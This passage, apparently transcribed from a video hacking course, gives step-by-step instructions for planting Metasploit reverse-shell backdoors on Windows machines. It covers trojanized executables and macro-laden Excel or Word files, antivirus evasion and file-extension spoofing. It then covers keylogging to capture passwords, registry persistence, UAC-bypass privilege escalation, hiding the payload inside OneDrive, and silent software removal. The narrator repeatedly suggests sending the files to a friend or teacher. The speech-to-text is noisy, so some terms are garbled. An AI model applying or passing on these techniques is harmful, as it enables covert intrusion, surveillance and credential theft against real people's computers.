I'm gonna say, for example, shell reverse TCP. I tested that, but it didn't work with me. So I'm gonna test this one. It's number 5. I'm gonna press enter. Then I'm gonna put the Cal Linux IP address. Then the L port is gonna be 8080, and I'm gonna press enter, and successfully injected. Okay, so the last step is to run a listener to listen for the incoming connections. So I'm gonna use MSF console or Metasploit. I'm gonna say first, I'm gonna set a listener, then I'm gonna specify the payload, then the L port and the L host. Okay, so I'm gonna say use exploit multi-handler to set a listener. Then the next step is to specify the payload. So set payload Windows shell reverse TCP. Then I'm gonna show options, and I'm gonna set the L host as my Cal Linux IP address, and set the L port 8080, as we specified before. Then I'm gonna say run, and now I'm gonna send this file to the target machine to see whether it does work or not. So I'm gonna put it on in my web server. It's in my computer var www html, and I'm gonna paste it here. And now I will go to my target machine. Here is it. I'm gonna install it. So everything is legit, so nothing suspicious here. I'm gonna run it right now. So more info, run anyway. And as you can see, it does work. Let me check if I have got a reverse connection to my Kali machine. As you can see, I can do anything, ls, dir, or who am I, as you can see, and I can do a lot of things. So we learned from this video how to convert any exe or any image or mp3 file, pdf. You can do that with everything to an executable, then inject a payload into this executable file, then run it in the target machine, and everything will look like legit and nothing's gonna be suspicious. Because the good thing in Windows that it will not show you the extension of for any file or any image, or as you can see, there is no .jpg here, there is no .exe, and that's come by default in Windows. Now we will see how you can combine your payload with any Excel or Word file. This is done by generating a normal encoded payload using val evasion. Then we are going to be using a tool called MacroShop that will convert this payload to an Excel or Word script. And then we will inject this script into the Word or Excel file that we want to backdoor it. And then we will save it, and once the target opened the Excel or Word file and he enabled the macro option, you will get a reverse connection to your machine. Now let's see how you can do that. Okay, so the first thing we're going to be doing is you will open your browser and you will go to the link in the description, which is the MacroShop tool that we're going to download it on our Kali Linux. And then you will go to get clone or download, and then you can copy the link. And then you're going to open your terminal and you will type get clone and then the link. Here is it, and once you hit enter, it's gonna be downloaded on your root directory. In my case, I have already downloaded. Let me show you it. So I'm gonna say ls, and here is it, MacroShop, cd MacroShop. Here is all the files and the scripts that are in MacroShop. So, but before we do anything, we should generate an undetectable backdoor using val evasion. So I'm going to val evasion. Use one to use val evasion, and I'm gonna say list to list all the payloads, and the payload that I'm gonna use it is PowerShell Metasploit reverse HTTPS. Actually, I tried to use PowerShell Metasploit HTTP and reverse TCP, but the antivirus managed to detect these payloads. So I'm gonna be using a reverse HTTPS. It's number 21. I'm gonna say use 21 to use this payload, and I'm gonna set the L port 8080, and the L host is gonna be my Kali Linux IP address. And I'm gonna say generate to generate it, and here is it. I'm gonna take the full path of the payload. I'm gonna say Ctrl C, CD, and now I'm going to copy this, or I'm gonna copy the payload 1.bat to my Apache server. So I'm gonna say copy, then I'm gonna put the full path of the link that I have copied, which is the full path, which is the path of the payload that we have generated, and I'm gonna put the full path of my Apache server. So it's in var www html and enter, and now the payload 1.bat is in my var www html, which is my Apache server. So the second thing I'm going to be doing is I'm going to MacroShop tool. So I'm gonna say cd MacroShop, and I'm gonna say ls. And I'm gonna be using this tool macro underscore save.py. So I can say add /macrosave.py, add enter, And you can see here it's telling us you have to put this command that we have already used, and then the path of the payload, and then you can put the full path of the output text or the script that will be generated by the macro shop tool. So let me give you an example. Here's the script that we're going to be using, macrosave.py, and then we will put the full path of our payload that we have generated, which is in var www html, and it's called payload1.pad. And now I'm going to put the full path of the output text that we're going to be injecting it in the target Excel file. So I'm going to say var www html, and I'm going to call it script.txt. So let me maximize it a little bit. So here's the name of the script that we're going to be using it, and then the full path of the payload that we have generated, and then the full path of, you're going to put the path of the output text that we're going to inject it in the Excel. So I'm going to say enter, and here's the text that we have to copy it and paste it in the workshop of Excel file or Word file. And actually this text file has been generated on our Apache server. Let me check this. So I'm going to say cd var www html ls, and you can see here that we have script.txt and payload.pad. We're not going to be using this. We will only use the script. So the last thing is you will activate your Apache server. So service Apache to start, and now our Apache server is live. Let me come back to my Windows machine, and I'm gonna open my browser and 10.02.15, and here's the script. And because there is no Microsoft Excel for Cal Linux, you have to use your Windows virtual machine or your host machine to create a new Excel file and copy this code and paste it into the Excel file or the Word file and save it with the macro. And then you can send the Excel or the Word file to your friend, and once he opens it and enable the macro, the code will be executed on his machine and you will get a reverse connection. So now we're going to be doing what we're going to be doing right now is we'll create a new Excel file. Here is it, and now I'm going to open it, and now I'm going to say Alt F11 to open the workbook. Here is it. So if I double click on this workbook, you will get this window, and we will copy this code that we have generated to the workbook here. So I'm gonna paste it here, and I'm gonna close the window, and I'm gonna save this file, save as, browse. I'm gonna save it on my desktop. And one thing you have to do is save as type Excel macro enabled workshop. So enabled workshop will execute this code once he run the Excel file. So now I'm gonna say save, and everything is done. Let me close everything. Let me delete the old file, and here is the new file. So you're gonna be sending this file to your friend or to your teacher, just for example, and once he opens the Excel file, you will get a reverse connection. But before we open it, let me go to my Cal Linux and run Metasploit and set a listener. So I'm going to say MSF console and use exploit multi-handler to set a listener. Then I'm going to be using the payload reverse HTTPS because we used that in our payload. So Windows Metasploit, here's it, and show options. I'm gonna set the L port as 8080 and the L host is my Cal Linux IP address. So I'm gonna say run, and I'm gonna wait for reverse connection, and I'm gonna come back to the target machine. So after sending this file to the target, he's gonna open it, and then he's going to enable the content. If he clicked on enable content, he will get a reverse connection. So let me check here, and as you can see, we managed to get a reverse connection. So if I type pwd ls, and let me come back here, and even if I close the Excel, I'm going to be able to interact with Windows. So sysinfo, and as you can see, everything is working. So we learned from this lecture how you can combine your payload with Excel file or Word file, and this is by converting our payload to a macro script, then injecting this macro script into the file or the Excel file or the Word file that we want to combine our payload with, and then we can save it as a macro enabled, and then we can send it to our friend or to our target, and once you open it and enable the content, you will get a reverse connection. But one thing I want to notice is that you have to test it before you send it to your friend, because it's not 100% undetectable. We learned from the previous videos how to generate an undetectable backdoor and how to combine it with any certain type of file, whether it's image, PDF, exe, etc. But in this lecture, I'm going to show you a trick allows you to spoof your Trojan extension to any extension you want, and it's by using right to left override character. And what it does is it will flip the exe extension from the end of the line to the middle of it. So to do that, first you are going to type the reverse of the spoofed extension. Let's say, for example, you want to spoof an executable file to a JPG. So you will type after the name of your backdoor the reverse of JPG extension. So instead of typing JPG, you will type GPJ. Then you will paste the character between the name of the backdoor and the spoofed extension. Then you will realize that the extension of your backdoor will be changed to JPG. I'm going to show you how to do that in Windows and Linux, so let's see how we can do that. Okay, so to do that, I'm going to copy a certain character from the characters in Cal Linux. I can do this in Cal Linux and I can do this in Windows, but I'm going to start with Cal Linux just to give you an idea. So I'm going from here to show application. Then I will go and search for characters. I'm going to click on it. Then I'm going to search for a character called 202E, and it's called right to left override. So I'm going to click on it, then I'm going to say copy character to copy the character, and as you can see, the Unicode of the character is 202E. So I have copied the character, and I'm going to give you an example with this file. If I rename this file, as you can see here, so the idea here to put instead of JPG, we're gonna put the reverse of it, so it's gonna be GPJ. I'm gonna show you how to do that. So GPJ, and then I'm gonna pass the character that I have copied in the middle, so it's gonna be between wallpaper and between GPJ. So I'm gonna paste it here, and you can see here that everything is flipped right now. The extension is JPG, but actually the actual extension is exe, but we spoofed the extension to JPG, so the user will see it as JPG. I'm gonna say rename. It's gonna be like a little bit complicated here. Let me delete something from here. And as you can see, it's .jpj. Okay, so to do this in Windows, I'm going to my Windows machine. Here, as I said before, Windows hide the extension of the files. I'm going to enable it just to give you an example. So I'm going to control panel, then appearance and personalization, then find Explorer options. Then I'm going to view, and I'm going to say, or I'm going to uncheck hide extension for unknown file types. And okay, and as you can see, I have right now the full extension of the file. I'm gonna do the same thing, but to get the character map, I'm gonna hold the Windows key and R together, and then I'm gonna type charc map. So it's gonna be like that, char map. So I'm gonna type it. I'm gonna say enter. Then you will select the font is gonna be Arial, and you will scroll down until you see an empty boxes. Yeah, it's gonna be here, and you can see here U plus 202F, which is not what which is the wrong one. On the left side we have right to left override, and it's 202E, and we're gonna copy this character. So I'm gonna select it, then I'm gonna say copy, then I'm gonna close this window. I'll do the same thing here. So I'm gonna say GPJ, which is the reverse of JPG, and I'm gonna paste the character between wallpaper and GPJ. And as you can see right now, the extension is JPG. You can see here. Let me change it to MP3 just to give you an example. Let's say I'm gonna call it again song. Right now it's song.exe. I'm gonna change it to MP3. So I'm gonna type the reverse of MP3, which is 3 p.m. Then I'm gonna pass the character that I have copied in the middle between song and 3 p.m. And you can see right now the extension is .mp3. So our payload is not gonna be suspicious because it's combined with an image, and the extension is JPJ, and so it's gonna be like legit image. Let me convert it to let's say evil first, as the evil tower. So I'm gonna say GPJ, and then I'm gonna flip it like this. Then I'm gonna try to run this payload, but before I do that, I'm gonna set a listener and listen for the incoming connection. So I'm gonna type msf console in the new terminal. Then I'm gonna set a listener as I did in the previous video. So I have got this error message because I didn't initialize my database, but Metasploit is gonna work, so it's not gonna be a problem. So I'm gonna say use exploit multi handler to set a listener. Then I'm gonna say set payload Windows shell reverse TCP as I did in the previous video. Then I'm gonna say show options to set the L port as 8080, and the L host is gonna be 192.168.233.150, which is my Kali Linux IP address, and I'm gonna say run. Okay, I will come back to my Windows machine. I'm gonna try to run it. So run. As you can see, it does work. I will come back to my Kali Linux machine, and I can see a reverse connection, and I can type anything I want. So we learned how to compile a certain image, or to convert a certain image or anything to an exe, then compile it to an exe, then how to spoof the extension of the file. So actually we are not changing the actual extension, we are only spoofing it, so it's gonna work anytime. In the previous section, we've seen how to combine our payload with any type of file so that we can make our payload unsuspicious. We've seen how to combine it with an exe file or an image or PDF file, etc. And after having the full access to the target machine, now it's time to move to the post-exploitation section. In this section, you'll learn the command that can be used to interact with the target machine and the module that can be executed on the target operating system. I'm going to be explaining the best Windows module that you can run on the target operating system, whether he's using Windows 10, 8.1, 8, 7, or even Vista and XP. I'm going to show you how to escalate your privileges and persist your connection in the target machine and much more. And finally, if you faced any issue during the practicing, don't hesitate to ask me in the Q&A section of the course or send me a direct message and I'll be glad to respond. Now we are going to learn the most useful command to interact with the target computer from Meterpreter command line. Actually, there is a lot of commands that you can use in Meterpreter command line, but in this video I will focus only on the most popular and useful commands, because without knowing these commands, you will not be able to do anything in the target computer. So we are going to start with this command. We have first pwd, that shows you your current working directory, and cd is to change your directory, and ls shows you the content of your current directory, and shell used to interact with Windows through Windows PowerShell, and upload used to upload a certain file or folder, and also we have download to download a certain file or folder, and lastly execute to execute a certain program on the target computer. And now we are going to take an example for all of these commands that we talked about. Okay, so the first command I'm going to use in order to interact with Windows is pwd. So pwd used to show you your current directory, so you are in cpartition users iSecurity downloads. And also we have ls is used to or it will show you the content of your current directory. So now I'm in downloads, as we saw here. I'm in downloads, and here is all the programs or all the photos and txt file and exe programs. So here is all the content of downloads folder. And we have also cd. Cd is used to change your directory, your current directory. So I'm gonna start with cd dot dot. So cd dot dot will allows you to come back to your previous folder. For example, I was in partition C users iSecurity downloads, as you can see here, and now I am in iSecurity. And in order to go to a certain file, I'm gonna say cd or change directory. Then I'm gonna go to then I'm going to my desktop. If I type again pwd, I will see that I am in the desktop. I'm gonna type again ls to see the content of my current directory. And now I'm gonna use shell command just to show you that I can also interact with Windows or through command prompt. So I'm gonna type dir, and here is all the folders and or here is all the program that is in my desktop or the target desktop. So also we have upload and download and execute. Let me exit from here first. So we have upload. In order to use or in order to upload a certain file, you have to copy it to your home directory. For example, here I have my wallpaper or a wallpaper. I'm gonna upload a certain wallpaper. Just let me delete all of this. I'm going to copy my file or my folder or anything else and paste it in my home directory in my Cal Linux. Then I'm going to type here upload, then my wallpaper name, and enter. And because you are in the desktop, so this wallpaper will be uploaded to the desktop of the target computer. I'm gonna type ls again, and you'll see that I have wallpaper JPG. And also we have download. We are going to download a certain program. For example, I'm going first to my downloads in the target computer, pwd, and as you can see right now I'm in downloads. I'm gonna say ls, and I'm going to download this program to my Cal Linux machine. So I'm gonna type download, then meter or the name of the file you wanna download to your Cal Linux machine, and enter. So this program will be downloaded on your home directory in your Cal Linux. And the last command we are going to use is execute. So execute command used to execute a certain program or exe program. For example, I'm going to my desktop first, and right now I am in the desktop. I'm gonna say ls again, and I'm going to run this program. So I'm gonna say execute -f, and I'm gonna add the name of the program that I'm going to run it in the target computer. For example, I can upload a virus or Trojan or anything to the target computer, and then I can execute it in the target computer as well. So I'm gonna paste the name of the program that I'm going to run it. I'm gonna say enter, and process. The idea of the process has been created. Let me come back to my Windows machine and see if anything changed. And as you can see, we have executed this program, TeamViewer. Let me come back to my to my meterpreter command line. So we learned pwd shows you your current directory, and ls to show you the content of your current directory. and we have cd to come back to your previous folder, and also we have cd to change your folder, and shell in order to interact with Windows through command prompt, and upload and download and execute to download or upload or execute a certain file. So this video is going to be divided to two parts. The first part is this one, and the second part is going to be, for example, or you will have fun with the target computer. For example, you will be able to capture the keystrokes, screenshot, and more, or for example, disable the keyboard and the mouse and more. So I'll see you in the next video. So now we are going to have some fun with the target computer. But before we get started, there is something I didn't mention is if you type help in Metasploit command line, you'll be able to see a lot of commands that you can use to interact with the target computer. For example, here we have record mic to record audio from the target computer, and we have also webcam chat to start the video chat with the target computer, and we have a lot of things to do. So in this video, I'm gonna focus on the funniest command that you can do in the target computer. So we're going to start first with UICTL. So UICTL allows you to enable or disable the keyboard or the mouse in the target computer, or both of them, for example, the keyboard and the mouse. So I'm going to start with UICTL and disable keyboard. So now if I come back to my Windows machine and open a certain any text file, and try to type anything, I'm not gonna be able to type anything because the keyboard is disabled. So right now I will come back to my Linux machine and enable the keyboard again, but this time I'm going to disable the mouse. So let me right now type UICTL disable mouse, enter. So if I come back to my target machine and try to do anything, I will not be able to do anything because my mouse is disabled, so I cannot interact with the Windows. So I'm gonna enable the mouse again. Then we can move to the next command. So the next command is gonna be screenshot, and it's very simple and clear because it will take a screenshot of the target computer. For example, let me come back here and try to open Google Chrome. So I will come back to my Windows machine and type screenshot, then I will press enter, then a screenshot will be saved to my root directory. So I have all screenshots, but I think this is the newest one, and as you can see here is the newest screenshot from the target computer. So I'm going to close everything, and also we have a very useful command called key scan. Key scan allows you to capture the keystrokes of the target keyboard. So I'm gonna show you an example. Type key scan, then start, and now you are able to capture all the keystroke of the target keyboard. So if I come back to my Windows machine, I'm gonna close Google Chrome, and I'm gonna say here my name is Sad. Then I'll come back to my Linux machine, and I'm gonna type key scan again, but instead of start, I'm gonna say dump. So, and as you can see, return, that's mean enter, my name is Sad. I was able to capture the keystrokes of the target computer. So maybe he typed his email or password, so you'll be able to capture his email and his password, just for example. And also we have another useful command called PS. PS shows you the running services and processes in the target computer. For example, I'm gonna type PS and press enter. As you can see, here's my backdoor is running, and there is a lot of service or Windows services running in the background of the target computer. I have Notepad and a lot of things. So, for example, there is another command called suspend. Suspend used to suspend a certain service or certain process in the target computer. For example, I'm going to type suspend, then the ID of this process, then you will realize that this service has been suspended. So I'm going to type suspend, then the ID of the service or the process, which is 2304, So we're going to suspend the notepad because it's running here, as you can see. So it's 2304. Then I'm gonna press enter. I will come back to my Windows machine and I'm gonna try to do anything. I'll not be able to do anything because this service has been suspended. So I cannot interact with the notepad right now. I will come back to my Kali Linux machine, and this time I'm going to kill the service. So for example, if he was running a game or he was running a notepad or any browser, or actually you can kill the Explorer, or yeah, you can kill the Explorer, excuse me. Then he will not be able to use Windows. So I'm gonna type kill, then the ID of the service. For example, here we have 2304 in order to kill notepad service. So I'm gonna 2304, then I'm gonna press enter. Then I will come back to my Windows machine, and as you can see, the service has been ended. So I'll come back to my Kali Linux machine, and I'm gonna type help again, and I will see a lot of comments that I can use in order to interact with the target computer. For example, here we have reboot, to reboot the target computer, and we have a lot of things. So this was the most important comment to interact and having fun with the target computer. I hope you enjoy in this video, and see you in the next video. After learning the command that you can use in order to interact with the target machine, in this video I'm going to show you the most important thing that you have to do after hacking a certain operating system, which is persist your connection with the target operating system. Because normally, once the target power off his machine, you will lose the connection between your machine and the target operating system. But if you manage to persist your connection in the target operating system, you will get a reverse connection anytime. Even if your target tried to power off or restart his computer, you will get back a reverse connection. So to do that, we are going to use a module that allows us to persist our connection with the target machine, and this is by injecting our payload in the target registry. So that means whenever the target tries to restart or boot his machine, our payload will run automatically, and it will try to connect back to us. So let's see how we can do that. As you can see here now, I have 1 meter printer session is open, so I can interact with it. So I can type sysinfo to see the system information, pwd to see my current directory. And in order to persist my connection with the target machine, first I'm gonna put this session in the background by typing background. So the first thing I'm gonna do is I'm gonna use a module called persistence. So I'm gonna type use exploit Windows local persistence. Then I'm gonna press enter. Then I'm gonna type show option to see all the available options, and let me maximize this a little bit. And the most important option that you are going to specify is exe name. So this is the payload, or the name of the payload that you want to inject it in the registry. So I'm gonna say set exe name to just for example, I'm gonna say sad, which is my name, or let me say service 1, enter. And you have here delay, which is after how many seconds it's gonna try to connect back to you. So 10 is okay. Then I'm gonna specify the session. I'm gonna type first sessions to see all the available sessions, and I can see here that I have session 1 is open. So I'm gonna type set session 1, specify the session. And another thing you are gonna do is you are gonna specify the payload that you want injected in the target machine, in the registry of the target machine. So you are gonna type show option, or not show options, show advanced, which is the advanced option of this module. So each module has a advanced option, and you are gonna specify exe custom. Then you are gonna put the full path of your payload. So I'm gonna say set exe custom. Then I'm gonna put the full path of my encoded payload to inject it in the registry of the target machine. So it's in root desktop and it's called reverse tcp1.exe. Then I'm gonna press enter. So I'm gonna type show options again. So here we have the exe name, or the payload name that will run in the processes, which is service 1, and the session, which is important thing that you are, or the session or the target that you are gonna import, that you are going to inject your payload in his registry. And also we have custom, or here is exe custom, which is your payload that you are going to inject it in the target machine. So I'm gonna say run. And our payload has been successfully injected in the target machine. I'm gonna say back, and you can see here I have one Metasploit session. I'm gonna try to turn off the target machine. So I'm gonna say restart, and you can see here that there is one Metasploit session has been closed. And I'm gonna specify the listener that will listen for the incoming connection. So use exploit multi handler. The payload is reverse TCP. So Windows Metasploit reverse TCP. Show options to see all the options, and everything is specified. So I'm gonna type run. And I'm gonna come back to the target machine, and I'm gonna wait for it until it connects to my Kali Linux machine. So right now I'm gonna try to come back to my Kali Linux machine and see if there is any Metasploit session. We can see here that there is no Metasploit session, but we're gonna wait until it's run our payload. So I'm gonna wait a little bit. Let me come back to my Kali Linux machine, and as you can see, I have one Metasploit session is open. So I'm gonna say just right now exit to exit this and close this Metasploit session, and I'm gonna say run again, and you can see that it will run again, and it will give me another Metasploit session, because it will try to connect back to us after 10 seconds. And as you can see, we have another Metasploit session. Let me close it again by typing X, and I'm gonna say run again, and it will try to connect back to us after 10 seconds. So as you can see, I'm going to type pwd sysinfo, and everything is working. So if we came back to our Windows machine and go to the running processes by going to the task manager from here, and then I'm going to details, I'm going to see the server that I have named it as service 1, as you can see here, service 1. So this is our payload, and then in the next video I'm going to show you how to migrate and hide this payload and migrate it with another running process, so you can migrate it with Malwarebytes or any process that's running in the background. So we learned from this video how to persist our connection with the target machine, and this is by injecting our payload in the startup in the target registry, and whenever he try to restart his computer, our payload will run automatically and try to connect back to us every 10 seconds. In the next video I'm going to show you how to migrate this process or this payload with another process, just to hide your payload from the processes list. So far we've seen how to persist the connection in the target operating system by injecting our payload in the registry. But in this lecture, I'm going to show you another important thing that you can do, which is escalating your privileges in the target machine. because escalating your privileges in the target computer allows you to do whatever you want. For example, you can add users, delete users, change the user's passwords, or uninstalling programs, etc. And I'm gonna show you all of that in the next lectures. So this video is going to be divided to two parts. The first one shows you how to escalate your privileges in Windows 10, and the second one shows you how to do or how to escalate your privileges in Windows 8.1, 8.7, etc. And I'm going to show you two methods allows you to escalate your privileges in the target machine. So if the first one didn't work with you, you can try the second one. So let's see how we can do that. Okay, so as you can see here, now we have one Metasploit session is open. I'm going to type get UID to see my privileges, and you can see that I am a user. And there is many commands that you can run to check whether you are an administrator or not. So for example, if you typed get system, you're not going to be able to run this command because you are not an administrator. And also we have hash dump. Also, you're not going to be able to run this command because you don't have the administrator privileges. So to get the administrator privileges, we have two methods. I'm going to show you first the first method is by using ask module. So first, I'm going to put the session in the background. Then I'm going to say use exploit Windows local ask. Then I'm going to say show options to see all the options. And you can see here that I have to specify the session, which is already specified, number 1. And the technique is going to be by default EXE, and you have to change it to PSH, which is Windows PowerShell, because the antivirus in the target machine will be able to detect the EXE, but it's not going to be able to detect the Windows PowerShell technique. And here you can see that it's going to give you a reverse TCP or Metasploit session. So I'm going to say run, and now the target will see window will pop up in his computer, and it will ask him to accept this certificate. If you clicked on show more details, you can see that this command will run in the target command prompt in order to escalate your privileges. I'm gonna say yes right now, and sometimes this method it's gonna work and sometimes it's not gonna work. As you can see here, this time they didn't work with me, but I'm gonna show another method to do that, and it's not gonna ask the target to press yes or no. So to do that, we are gonna use another module called bypass UAC event VWR. So I'm gonna say use exploit Windows local, then I'm gonna type bypass UAC underscore, then I'm gonna say event VWR. I'm gonna press enter, then I'm gonna say show options to see all the options. I'm gonna specify the session which is already specified, number 1. And here you are gonna see that you will get a reverse TCP Metasploit session, and it's in port 444, or you can change it. And here you can see the targets, which is you have, if you type show targets, you can see Windows 64 or Windows 86. Both of them is gonna work. So first we are gonna try to get one Metasploit session. Let me type show options again. So the session is number 1, and you are gonna get Metasploit reverse TCP session, and Windows 86 or 32-bit is gonna work with you. I'm gonna say run. And as you can see, you have got one Metasploit session. If you type get UID, you can see that you are still user. But if you type get system again, you can see that you are an admin. So I'm gonna type hash dump again to see whether it's gonna work. It's not gonna work this time, but I'm gonna show you in the next video how to run it. So if you type get UID again after typing get system, you can see that you are an authority system. I'm gonna put this session in the background and show you how to get PowerShell or Windows PowerShell session with the administrator privileges. We're gonna use the same module, which is bypass UAC event VWR, but the only thing that we are gonna use it is the payload type. So I'm gonna say set payload Windows shell reverse TCP, then I'm gonna press enter. Then I'm gonna say run again. So if I type show options again, you can see that we have Windows shell reverse TCP. So it's gonna give us Windows shell command line, and you can leave the target as 86-bit or 32-bit. I'm gonna say run again. And as you can see, you have got one Metasploit session with the administrator privileges. To check that, you can type net user, and you can see the IE user is an administrator. I'm gonna say exit to close this session. And if I type session, I can see two sessions. The first session is without the administrator privileges, and the second one is with the administrator privileges. So let me type session -i number 5 to interact with it. I'm gonna type get system. It's gonna work perfectly without any issues. And get UID. You can see that you are an authority systems, and we are gonna learn in the next videos how to use the administrator privileges to modify the setting of the target machine. And if you come back to the target machine, you can see that there is nothing is running right now. There is no certificate that you have to accept it in order to be an administrator. So we learned from this video how to get the administrator privileges. The first one is by using the ask module, and the second one is by using bypass event BWR module that allows you to get Metasploit session or Windows PowerShell command line. In this video, I'm going to show you how to escalate your privileges in Windows 8.1 or Windows 8 or Windows 7 or XP, etc. So we saw in the previous video how to escalate your privileges in Windows 8, and I explained the module ask and bypass UAC event BWR. But if you tried these modules and it didn't work with you, you can try another modules that I'm going to explain in this video. So here we have Windows 8.1. So if I type sysinfo, you can see that I have Windows 8.1, and I'm going to put it in the background and use another module called bypass UAC underscore injection. So I'm gonna say exploit, use exploit Windows local, and I'm gonna say bypass underscore injection. I'm gonna see all the options, all the available options, and I'm gonna specify the session, which is number 4. So I'm gonna say set session 4. Let me check again. So here we have only the session is number 4, and the system is 32-bit. I'm gonna type run, and you can see here that it will open a new Metasploit session. So if I type get system, you can see that I am an admin in the memory, or get UID. You can see I am authority system, and nothing will pop up here and ask you to press yes or no, or so everything is gonna be normal. I'm gonna put this session in the background, and I'm gonna use another module called or the same module that we used before, which is event VWR, to see whether it's gonna work or not. And I'm gonna try ask as well. So I'm gonna say, or let me see the session. I'm gonna kill session number 5. So I'm gonna say sessions -k to kill number 5. And if I check the session again, I can see we have only number 4. So I'm gonna use another module that I talked about in the previous video. So Windows local. I'm gonna try ask to see whether it's gonna work or not, and show options. And I'm gonna set the session number 4 and set technique PSH, because EXE or the antivirus will be able to detect the EXE technique. I'm gonna say run and see the result. I will come back to my target machine and I'm gonna press yes. Then I'll come back here and you can see that this time it did work. I'm gonna type again get system see whether I'm an admin or not, and as you can see in memory admin, and get UID. As you can see, it's a 30 system. And right now I'm gonna use the module which is event VWR to see whether it's gonna work with Windows 8.1. So I'm gonna delete the last session, which is number 6. So sessions, okay, I'm gonna kill number 6. If I checked again, you can see I have only the session that I'm not an administrator with. So I'm gonna say use exploit Windows local, and I'm gonna test or if you type bypass UAC, you can see that you have 4 modules. I tried VPS and it didn't work with me, and injection did work with me, and bypass UAC it didn't work. Event VWR, I'm gonna test it right now. So I'm gonna put bypass UAC event VWR to see if it's gonna work or not. Show options, and I'm gonna specify the session. So set session number 4, and I'm gonna make sure that everything is correct. The session is number 4, and it's gonna open Metasploit session, or you can change it to Windows shell. And I'm gonna type run, and we can see here that nothing's gonna run or pop up and ask you to accept a certain thing or not. So I'm gonna say get system again, and you can see that I'm an admin, and if I type get UID, I'm an authority system. So we learned how 3 modules to escalate your privileges. One of them called bypass UAC injection, or bypass UAC event VWR, or you can try ask if both of these modules didn't work with you to escalate your privileges in the target machine. In this lecture, I'm going to show you how to migrate your payload with any process running in the target operating system, whether it's a normal process or a system process. So if the target tries to check the running processes and services on his operating system, he will not be able to find our backdoor because it's migrated with other process. And to migrate your backdoor with a certain system process, you should have an administrator privileges in order to do that. Okay, so here we have 2 Metasploit sessions. The first one is without the administrator privileges, and the second one is with the administrator privileges. So first I'm gonna migrate the process or the payload that's running in the background of the target machine with another process. I'm gonna start first with the first user or the first session, which is number 5. So to interact with it, I'm gonna type sessions, then -i to interact, and 5. And now I'm in the target machine, and I can interact with his machine directly. So I'm gonna type get UID to see my privileges, and you can see right now that is user. Okay, so I'm gonna type PS to see all the running processes in the background of the target machine. And you can see here all the running processes that's running in the target machine in the background. And to see my payload or my process, I'm gonna type get PIT, and it has 577 or it has the PID 5744. I'm gonna search for it, and it's here. It's called reverse HTTPS 1. And in my case, I think this is a little bit suspicious, because if the target, you go to the task manager from here, then go to details, and he's trying to search for something suspicious, he's gonna find here that there is something called reverse HTTPS. Of course, you can change this to something else, but here it's gonna steal the name of the thing of the process that's running. So he can go to open file location and see that this one is suspicious process. So he can delete it, or he can go to police and report for it. So what we're gonna do, we are gonna combine, or we are gonna migrate this process with other process. So I'm gonna migrate it with OneDrive, because actually OneDrive is, or everyone knows OneDrive, and it's the official service of Microsoft that comes with Windows 10 to upload and download files from your account. So I'm going to the target machine, then I'm gonna type migrate, and then I'm gonna search for OneDrive from the running processes. So it should be here somewhere. And here's it. So you're gonna take the PID of the surface, which is 1368. I'm gonna take it and copy it. Then I'm gonna scroll down and gonna type migrate. Then I'm gonna put the process PID that I'm gonna migrate my payload with. So remember, our PID is 5744, and it's located here. Here's it. So it's gonna hide. It's gonna be hidden from the process list, and it will migrate itself with the OneDrive process. So I'm gonna put migrate, then the PID of OneDrive, and I'm gonna press enter. And it's successfully migrated. If I type again get UID, not get PID, you will see that my PID has been changed from 5744 to 1368. So if I type PS again and search for my payload, you're not gonna see it. As you can see, it's not here, because 5744 is not exist again. It's not exist. And I'm going to OneDrive, which is here, and my payload is migrated with this service. And if the target tries to go and search for something suspicious, he's not gonna be able to find anything, because our process is migrated with OneDrive, and OneDrive is an official service from Microsoft to upload your files to the cloud or to OneDrive. So right now I'm gonna come back and I'm gonna interact with the other session, which is number 6. So I'm gonna type session minus I to interact with number 6, and I'm gonna type get UID. Let me type first get system. Show you that I am an administrator, as you can see in memory as admin, and if I type get UID again, you can see I am an authority system. So I'm gonna type get PID to see the ID of process that's running in the target machine, which is 5976. I'm gonna say PS to see all the running processes, and I'm gonna say I'm gonna search for 5976. That's here, and it's called PowerShell. And I think PowerShell.exe is not suspicious, because also it's PowerShell is an official program from Microsoft. But in case you want to migrate it with other service or other process, I'm gonna migrate it also with OneDrive. So let me check. It's 1368. I'm gonna copy it, and I'm gonna say migrate. Then I'm gonna put the PID of OneDrive. So I'm gonna press enter. And you can see migration is completed. I'm gonna type again get PID to check my PID, and as you can see 1368 is my current PID. And if I type PS again to see the running processes, you can see that PowerShell is not exist anymore. And if I go to the target machine and try to search for PowerShell, it's not gonna be it's not gonna be exist anymore. As you can see, we have only Microsoft OneDrive, which is an official service from Microsoft. So we learned from this video how to hide our payload from the running processes that's running in the target machine. And this is by combining or migrating our payload with other service that's running in the background of the target machine. For example, we have migrated our payload with OneDrive process because OneDrive is an official service, comes by default in Windows 10. In this lecture, I'm going to show you how to uninstall programs and softwares that installed on the target operating system. And to do that, you should have the administrator privileges, and we learned from a previous lecture how to do that. So firstly, we should list all the programs and software that installed on the target operating system, and keep in mind that you can only uninstall the listed programs because sometimes it will not show you all the installed programs on the target operating system. And the good thing is the target will not see anything when we are uninstalling a certain program, so he doesn't have to accept uninstalling a certain program, and everything will happen in secret. Now let's see how we can do that. Okay, so the first thing I'm gonna do, I'm gonna check my privileges by typing get UID, and as you can see I am in a third-party system. And as I said in the introduction, you cannot uninstall any program without having the administrator privileges. So first thing I'm going to do, I'm going to see the installed programs and softwares that are in the target machine. So I'm going to put this session in the background, and I'm going to use a module called enum application. So I'm going to type use post windows gather enum applications. If I type show options, here it's telling me to specify the session, which is number 7. So I'm going to say set session 7. And now I'm going to type run. And you can see here is all the installed programs and application that is in the target machine. But one thing I'm going to say that this module is not going to show you all the installed programs, because if we came back to the target machine and checked the installed programs, you can see here we have malware bytes, and we have VMware tools, which is not exist here. So there is another method to check the installed programs by interacting with Windows PowerShell command line. So I'm gonna say Windows sessions -i7 to interact with session number 7, and I'm going to shell, and I'm going to use this command wmake product get name to see all the available. It's wrong, so let me repeat it again. W product get name, and I'm going to press enter, and now I can see all the installed programs and application. And here as well, you will not be able to see all the installed programs in the target machine. You can see here there is no malware bytes program, and there is no WinRAR program. So you can uninstall only these programs or software that is in the target machine. So let me say I'm gonna uninstall this program. Let me check here. Visual Studio 2012 86-bit. So here is it. I'm going to uninstall this program. So if I came back to my Windows command shell, I'm going to type wmake product where then name equal colon or double colon, then I'm gonna add the name of this program that I have copied, which is this one. Then I'm gonna close it with colon, and now I'm gonna type call on install and /no interactive. So this will make sure that the user don't have to accept the uninstallation. So I'm gonna repeat again, wmake product where then the name of the program that you want to install it, and we are calling uninstall command and no interactive to make this process in secret. so he don't have to press yes or accept or 